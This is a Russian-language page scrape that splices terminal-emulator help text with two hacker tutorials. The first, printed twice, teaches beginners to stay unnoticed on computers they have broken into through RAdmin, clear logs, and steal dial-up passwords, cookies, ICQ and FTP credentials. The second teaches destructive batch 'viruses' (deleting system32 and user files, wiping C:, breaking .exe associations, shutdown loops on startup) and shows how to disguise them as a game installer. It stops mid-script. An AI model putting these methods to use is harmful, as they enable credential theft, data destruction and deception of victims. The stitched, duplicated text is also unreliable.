По умолчанию, клавиша Backspace преобразовывается в код клавиши Delete. Некоторые удаленные компьютеры работают только с клавишей Backspace. Чтобы добиться совместимости, необходимо открыть меню Parameters и переустановить код клавиши Backspace.
Хочу другое имя сессии!
Вы можете изменить имя сессии появляющееся в строке состояния в правом нижнем углу через меню Parameters. В соответствующее поле данных вы можете ввести до 13 символов.
Хочу другой терминал!
В большинстве сессий эмулируется терминал VT100. У вас имеются другие возможности эмуляции:
● выбрать VT100 с графикой Tektronix 4014.
● использовать только команды VT100.
● игнорировать коды VT100 и Tektronix 4014.
Автоматический перенос строки
Если вы не хотите смотреть на беспорядочный поток символов, используйте символы конца строк. При включенной опции автоматического переноса строки переполненный текст автоматически переходит на следующую строку.
Адаптируемся к графическому интерфейсу
Как правило, режим быстрого вывода текста через буфер экрана несовместим с Windows. В файле конфигурации посредством опции bios вы можете установить так называемый режим адаптации.
В этом режиме текст на экране выводится через специальную программу, использующую доступ к BIOS.
Пароли и безопасность для всех .
Здарова всем начинающим хакерам!С вами redbu11.Да да,именно НАЧИНАЮЩИМ хакерам,потомучто то о чём сейчас пойдёт речь,всем опытным взломщикам давно известно.В одной из моих прошлых статей (Статья называется "2 идеальных метода взлома",тем кто её не читал,советую прочитать чтобы понимать лучше эту статью) я рассказывал о способах при помощи которых вы можете проникнуть в чужой компьютер и удалённо им управлять.Но я заметил по моим знакомым которые только начали заниматся хаком,и по многим новичкам в инете,что проникая в чужую систему имея возможность полнностью ею управлять,(Например при помощи радмина) то они просто начинают прикалыватся над челом,открывая ему блокнот на рабочем столе,и писать всякую дрянь,включать или выключать музыку,перезагружать компьютер и тд...Это всё конечно очень прикольно и весело,но ведь есть и идеи получше...
-Ну вообщем,я обращаюсь ко всем кто так поступает получая доступ к чужой машине... - Эй,проснись!Ведь в твоих руках целая система полностью под твоим контролем!И ты в ней теперь имеешь все теже права что и настоящий админ!
Зачем тогда тратить время зря на эти глупые шутки над админом и рисковать?Глупо!Есть же коечто лучше....
-Конечно!Пассы!Именно они!Главная цель почти всех взломщиков!Давайте об этом и поговорим.
И так,чуть выше я заговорил о том что мы рискуем так прикалываясь над админом.Конечно же рискуем.Ведь если админ видит что вдруг не с того не с сего у него на рабочем столе начинают вылетать всякие собщения,сами по себе открыватся блокноты,включатся и выключатся музыка,то наблюдая за всем этим "безобразием",он (или она) конечно же насторожатся,и начнутся подозрения что их взломали.При этом,если админ окажется не из ламеров,он может тебя спокойно вычеслить по IP и пожаловатся твоему провайдеру,и у тебя будут проблемы.Как они тебя вычеслят???Да очень просто.
ПУНКТ 1-ЫЙ - БЕЗОПАСНОСТЬ.
И так,немного о безопасности.
*Как многие на этом прокалываются:
-Вот например взламывая комп испольуя радмин,когда вы подключаетесь к кому-нибудь используя режим полного контроля,и не только,то тот к кому вы подключаетесь,если он откроет ярлычёк запущенного сервера радмина в нижнем правом углу панели инструментов,или наведёт курсор мыши на тот ярлычёк,то ему покажут текущии IP соединения с его компьютером,или же просмотрев логи,и он увидит ваш IP.
-При взломе другим способом админ тоже может просмотреть текущии IP соедиения,и увидить вашь IP.
Так что многие не зная этого прокалываются именно на этом.
-Ну а теперь подумайте,ведь если вы будете делать всё тихо не вызывая у админа подозрений,то админ видя что всё тихо и ничего не подазревая,он даже и задумыватся не станет о том что его взломали. Как этого добится?Да тоже очень просто если соблюдать несколько правил.
*Как обезопасится:
-Если вы например взломали комп с помощью радмина,то делайте всё тихо,не прикалываясь над админом.Пре подключении,используте в радмине режим передачи данных,(File Transfer) так как админ не будет видеть всё происходящее на своих глазах и он более подходящий нам для нужных наших действий.
-Ещё так сказать,чисть логи!Не оставляй лишний инфы о себе на взломанном компьютере,так как это могло бы привети к твоему вычеслению.И чисть за собой следы.Всё лишнее после взлома удаляй,подальше от глаз админа.=)
-Если взламываешь другими способами,то тоже без лишних приколов,делая всё тихо,ведь злой дядя админ тоже не всегда спит.=)))
Ну вот,о безопасноти разобрались,теперь можно переходить к пассам!Но не забывайте что безопасность прежде всего!!!
ПУНКТ 2-ОЙ - ПАРОЛИ И ДРУГАЯ ИНФОРМАЦИЯ.
Ну а теперь,о паролях.Как же о таком забыть!Если ты из тех кто всё только прикалывается над бедным в таких случаях админом,или не знаешь что делать со взломанным компьютером,то прочитайте этот пункт,и вы поймёте что раньше вы действительно ошибались!)))
-Находясь внутри чужого компа,вы можете увести пароли от аськи,вконтакте,ящики,логи сайтов,пароли на интернет,и ещё кучу интерестный информации!Ведь это уже действительно интерестно и лучше всяких там шуточек!!!
Вам наверное не терпится хоть немного узнать о том как достать хоть какие-нибудь пассы,тогда я вас обрадую,и расскажу вам о том как можно увести НЕКОТОРЫЕ пассы имея полный контроль над компом.(Чтобы потом небыло лишний осуждений и рассуждений,напоминаю,статья расчитана на совем новичков в этом деле,и описываю я здесь САМЫЕ ПРОСТЫЕ СПОСОБЫ для получения пассов.)
Так-же тут будет часто использвася подключения через RAdmin,так как этот способ проще понять новичкам.
-Начну я пожалуй с пассов на инет.Хоть это очень расостранённая тема на сей день,но оооочень многие про это незнают,но я надеюсь что они наткнувшись на эту статью узнают хоть что то нового для себя.
Достаём пассы:
1-Пассы на инет:
-Самый простой способ заполучения паролей на интернет,это используя такую программу под названием "dialupass".Эта программа записываеит пароли от интернета жертвы в нужный тебе файл,и сохраняет их на компе у жертвы в нужном тебе месте.Очень просто.
Представим что получили доступ к компу через радмин,и управляем им через RAdmin Viewer.
Тогда действия будут таковы:
*Как использовать эту прогу:
И так для начала качаем эту прогу,скачать её можно с сайта нашей хак группы http://unlock-team.ucoz.ru/ в разделе "Софт и видео"
Cкачали?Хорошо,теперь подключаемя к жертве в режиме "File Transfer",берём тот .exe файл из скачанного архива с программой,копируем его на комп к жертве например на диск C: (Можно куда хочешь,но так удобнее).Далее полключаемся к жертве в режиме "Telnet" для того чтобы запустить нашу прогу.И так,мы в режиме телнет,и теперь через командную строку запускаем нашу прогу,делаем это следующий командой:
C:путь_к_проге /allusers /stext "Куда_сохранить_пассы".
Поясняю:
-С:путь_к_проге - путь к проге которую мы залили жертве.
-/allusers - Получить пароли всех пользователей.
-/stext - Сохранить пассы в текстовом виде.
-"Куда_сохранить_пассы" - думаю и так всё ясно,куда сохранятса пассы.
Значит если наша прога называется dialup.exe и мы хотим сохранить полуенные пассы на диске у жертвы в файле passwords.txt то команда будет такова:
C:dialup.exe /allusers /stext "passwords.txt"
Всё,вводим эту команду и жмём ENTER.После того как мы это сделали,и если мы всё правильно сделали,снова подключаемся
к жертве в режиме "File Transfer" и забираем наши пассы)))
Но не забываем удалить все эти файлы поссле получения пассов!
Пассы вы получите если они введенны и сохранены в настройках системы,что бывает почти всегда пре dial-up соединениях.
*Заполучнеия Cookies.
Для этого идём по адресу C:Documents and SettingsИмя_пользователяCookies и забираем его куки.Потом заменяем нужные нам куки жертвы например от логов на сайте каком нибудь на свои,и система принимает нас за него.Всё очень просто.Так же если завладеете куками его ящика,то зайдя в ящик посмотрите нет ли там писем от поддтверждения регистрации,напоминания пароля,или просто письма которые высылают после регистрации в которых указывают твои данные,в том числе и пасс.У меня так часто бывало.
*Пароли от аськи.
Чаще всего они хранятся в .dat файлах которые находятся в папке с асей или в даже встречал случаи когда они были в папке с кукисами.
Такчто поищите,скопируйте из себе,потом берите например IPDBrute,и расшифровывайте пассы.Тут тоже всё очень просто.
*Другие файлы.
Поищите в директории C:WINDOW файл wcx_ftp.ini,так как если жертва использует Total Commander для доступа по FTP к сайтам,то так же как и с кукисами,если вы замените этот файл на свой,то получите досткуп к его сайтам.
Также поищите текстовые файлы на рабочем столе или на других дисках жертвы с пассами,так как чаще всего они просто хранят их чтоб не забыть на видном месте.
Пробуйте тоже использовать один и тот же пасс на всех акаунтакх жертвы,часто люди используют одни и те же пароли для всего.У меня так очень часто совпадало))))
Ну вот и всё,всё САМОЕ ПРОСТОЕ что должен знать НОВИЧЁК попадая на чужие компы.Как я уже и говорил выше,я описал только всё самое-самое простое,чтоб не сильно загружать новичков в этом деле.Больше и в расширенном профиле об этом в следующих статьях.
Всё что здесь описанно,это только для ознакомительных целей,за некорректное использование этого материала и не отвечаю.
Спасибо за внимания,всем удачи!
-Ну вообщем,я обращаюсь ко всем кто так поступает получая доступ к чужой машине... - Эй,проснись!Ведь в твоих руках целая система полностью под твоим контролем!И ты в ней теперь имеешь все теже права что и настоящий админ!
Зачем тогда тратить время зря на эти глупые шутки над админом и рисковать?Глупо!Есть же коечто лучше....
-Конечно!Пассы!Именно они!Главная цель почти всех взломщиков!Давайте об этом и поговорим.
И так,чуть выше я заговорил о том что мы рискуем так прикалываясь над админом.Конечно же рискуем.Ведь если админ видит что вдруг не с того не с сего у него на рабочем столе начинают вылетать всякие собщения,сами по себе открыватся блокноты,включатся и выключатся музыка,то наблюдая за всем этим "безобразием",он (или она) конечно же насторожатся,и начнутся подозрения что их взломали.При этом,если админ окажется не из ламеров,он может тебя спокойно вычеслить по IP и пожаловатся твоему провайдеру,и у тебя будут проблемы.Как они тебя вычеслят???Да очень просто.
ПУНКТ 1-ЫЙ - БЕЗОПАСНОСТЬ.
И так,немного о безопасности.
*Как многие на этом прокалываются:
-Вот например взламывая комп испольуя радмин,когда вы подключаетесь к кому-нибудь используя режим полного контроля,и не только,то тот к кому вы подключаетесь,если он откроет ярлычёк запущенного сервера радмина в нижнем правом углу панели инструментов,или наведёт курсор мыши на тот ярлычёк,то ему покажут текущии IP соединения с его компьютером,или же просмотрев логи,и он увидит ваш IP.
-При взломе другим способом админ тоже может просмотреть текущии IP соедиения,и увидить вашь IP.
Так что многие не зная этого прокалываются именно на этом.
-Ну а теперь подумайте,ведь если вы будете делать всё тихо не вызывая у админа подозрений,то админ видя что всё тихо и ничего не подазревая,он даже и задумыватся не станет о том что его взломали. Как этого добится?Да тоже очень просто если соблюдать несколько правил.
*Как обезопасится:
-Если вы например взломали комп с помощью радмина,то делайте всё тихо,не прикалываясь над админом.Пре подключении,используте в радмине режим передачи данных,(File Transfer) так как админ не будет видеть всё происходящее на своих глазах и он более подходящий нам для нужных наших действий.
-Ещё так сказать,чисть логи!Не оставляй лишний инфы о себе на взломанном компьютере,так как это могло бы привети к твоему вычеслению.И чисть за собой следы.Всё лишнее после взлома удаляй,подальше от глаз админа.=)
-Если взламываешь другими способами,то тоже без лишних приколов,делая всё тихо,ведь злой дядя админ тоже не всегда спит.=)))
Ну вот,о безопасноти разобрались,теперь можно переходить к пассам!Но не забывайте что безопасность прежде всего!!!
ПУНКТ 2-ОЙ - ПАРОЛИ И ДРУГАЯ ИНФОРМАЦИЯ.
Ну а теперь,о паролях.Как же о таком забыть!Если ты из тех кто всё только прикалывается над бедным в таких случаях админом,или не знаешь что делать со взломанным компьютером,то прочитайте этот пункт,и вы поймёте что раньше вы действительно ошибались!)))
-Находясь внутри чужого компа,вы можете увести пароли от аськи,вконтакте,ящики,логи сайтов,пароли на интернет,и ещё кучу интерестный информации!Ведь это уже действительно интерестно и лучше всяких там шуточек!!!
Вам наверное не терпится хоть немного узнать о том как достать хоть какие-нибудь пассы,тогда я вас обрадую,и расскажу вам о том как можно увести НЕКОТОРЫЕ пассы имея полный контроль над компом.(Чтобы потом небыло лишний осуждений и рассуждений,напоминаю,статья расчитана на совем новичков в этом деле,и описываю я здесь САМЫЕ ПРОСТЫЕ СПОСОБЫ для получения пассов.)
Так-же тут будет часто использвася подключения через RAdmin,так как этот способ проще понять новичкам.
-Начну я пожалуй с пассов на инет.Хоть это очень расостранённая тема на сей день,но оооочень многие про это незнают,но я надеюсь что они наткнувшись на эту статью узнают хоть что то нового для себя.
Достаём пассы:
1-Пассы на инет:
-Самый простой способ заполучения паролей на интернет,это используя такую программу под названием "dialupass".Эта программа записываеит пароли от интернета жертвы в нужный тебе файл,и сохраняет их на компе у жертвы в нужном тебе месте.Очень просто.
Представим что получили доступ к компу через радмин,и управляем им через RAdmin Viewer.
Тогда действия будут таковы:
*Как использовать эту прогу:
И так для начала качаем эту прогу,скачать её можно с сайта нашей хак группы http://unlock-team.ucoz.ru/ в разделе "Софт и видео"
Cкачали?Хорошо,теперь подключаемя к жертве в режиме "File Transfer",берём тот .exe файл из скачанного архива с программой,копируем его на комп к жертве например на диск C: (Можно куда хочешь,но так удобнее).Далее полключаемся к жертве в режиме "Telnet" для того чтобы запустить нашу прогу.И так,мы в режиме телнет,и теперь через командную строку запускаем нашу прогу,делаем это следующий командой:
C:путь_к_проге /allusers /stext "Куда_сохранить_пассы".
Поясняю:
-С:путь_к_проге - путь к проге которую мы залили жертве.
-/allusers - Получить пароли всех пользователей.
-/stext - Сохранить пассы в текстовом виде.
-"Куда_сохранить_пассы" - думаю и так всё ясно,куда сохранятса пассы.
Значит если наша прога называется dialup.exe и мы хотим сохранить полуенные пассы на диске у жертвы в файле passwords.txt то команда будет такова:
C:dialup.exe /allusers /stext "passwords.txt"
Всё,вводим эту команду и жмём ENTER.После того как мы это сделали,и если мы всё правильно сделали,снова подключаемся
к жертве в режиме "File Transfer" и забираем наши пассы)))
Но не забываем удалить все эти файлы поссле получения пассов!
Пассы вы получите если они введенны и сохранены в настройках системы,что бывает почти всегда пре dial-up соединениях.
*Заполучнеия Cookies.
Для этого идём по адресу C:Documents and SettingsИмя_пользователяCookies и забираем его куки.Потом заменяем нужные нам куки жертвы например от логов на сайте каком нибудь на свои,и система принимает нас за него.Всё очень просто.Так же если завладеете куками его ящика,то зайдя в ящик посмотрите нет ли там писем от поддтверждения регистрации,напоминания пароля,или просто письма которые высылают после регистрации в которых указывают твои данные,в том числе и пасс.У меня так часто бывало.
*Пароли от аськи.
Чаще всего они хранятся в .dat файлах которые находятся в папке с асей или в даже встречал случаи когда они были в папке с кукисами.
Такчто поищите,скопируйте из себе,потом берите например IPDBrute,и расшифровывайте пассы.Тут тоже всё очень просто.
*Другие файлы.
Поищите в директории C:WINDOW файл wcx_ftp.ini,так как если жертва использует Total Commander для доступа по FTP к сайтам,то так же как и с кукисами,если вы замените этот файл на свой,то получите досткуп к его сайтам.
Также поищите текстовые файлы на рабочем столе или на других дисках жертвы с пассами,так как чаще всего они просто хранят их чтоб не забыть на видном месте.
Пробуйте тоже использовать один и тот же пасс на всех акаунтакх жертвы,часто люди используют одни и те же пароли для всего.У меня так очень часто совпадало))))
Ну вот и всё,всё САМОЕ ПРОСТОЕ что должен знать НОВИЧЁК попадая на чужие компы.Как я уже и говорил выше,я описал только всё самое-самое простое,чтоб не сильно загружать новичков в этом деле.Больше и в расширенном профиле об этом в следующих статьях.
Всё что здесь описанно,это только для ознакомительных целей,за некорректное использование этого материала и не отвечаю.
Спасибо за внимания,всем удачи!
субота, 25 квітня 2009 р.
Чем опасные бат вирусы
В этой статье я не буду рассказывать как создовать вирусы с нуля вы уже это
узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).
В этой статье я научу вас
1.Ознокомлю с самыми злыми командами
2.Научу бат переделывать в exe
3.Предложу свою версию вируса
1.
Shutdown -t 0 –s -Эта команда выключает компютер
del *.* /q
После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:
del C:windowsfonts /q
Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:
del C:windowsMedia /q
Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.
del C:windowssystem32 /q /s
Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
del C:windows*.bmp /q /s
И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:
attrib -a -s -h -r C:*.*
del C:*.* /q
Но тут нам много удалить не дадут. Всё тристо раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:
rd %ProgramFiles% /s /q
А вот если написать:
rd C:Program Files /s /q
то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:
Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%Мои документы*.*" /q /s
--------------------------------------------------------------------------------
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251
--------------------------------------------------------------------------------
А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:
for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q
Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.
if not VIR*?????????.sys goto x
exit
:x
МУСОР.
Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.
--------------------------------------------------------------------------------
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.
rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска
chcp 1251
cd "%USERPROFILE%Главное менюПрограммы"
md 1 …и.т.д.
и папки будут создаваться в разделе программы.
Или допишите вот так…
chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.
допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…
Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…
assoc .lnk=.avi
здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!
assoc .exe=.avi
тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:
assoc .exe=
после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.
Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp
Можно путь для копирования поставить другой путь:
copy C:*.* C: program наш никчёмный файл появиться на диске С:
можно скопировать, что-нибудь другое:
copy C:windowssystem32*.* C:Microsoft*.exe
Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: "Создаём эффект программы" Есть другой способ копирования:
dir c: /s/a > C:/1.txt
Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:
copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK
Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)
А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.
xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.
--------------------------------------------------------------------------------
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
--------------------------------------------------------------------------------
Ах, совсем забыл, не пишите вот такую команду:
copy C:*.* C:Windows
А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.
Можно оповещать нашу жертву о ходе действия нашего вируса.
для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш
Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:
echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt
Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".
pause
Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
--------------------------------------------------------------------------------
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!
--------------------------------------------------------------------------------
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит... хм... вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!
Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:
Chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
attrib +h
вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.
Но и тут есть запара жертва открывает вир видит выскакивает окно
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject("WScript.Shell")
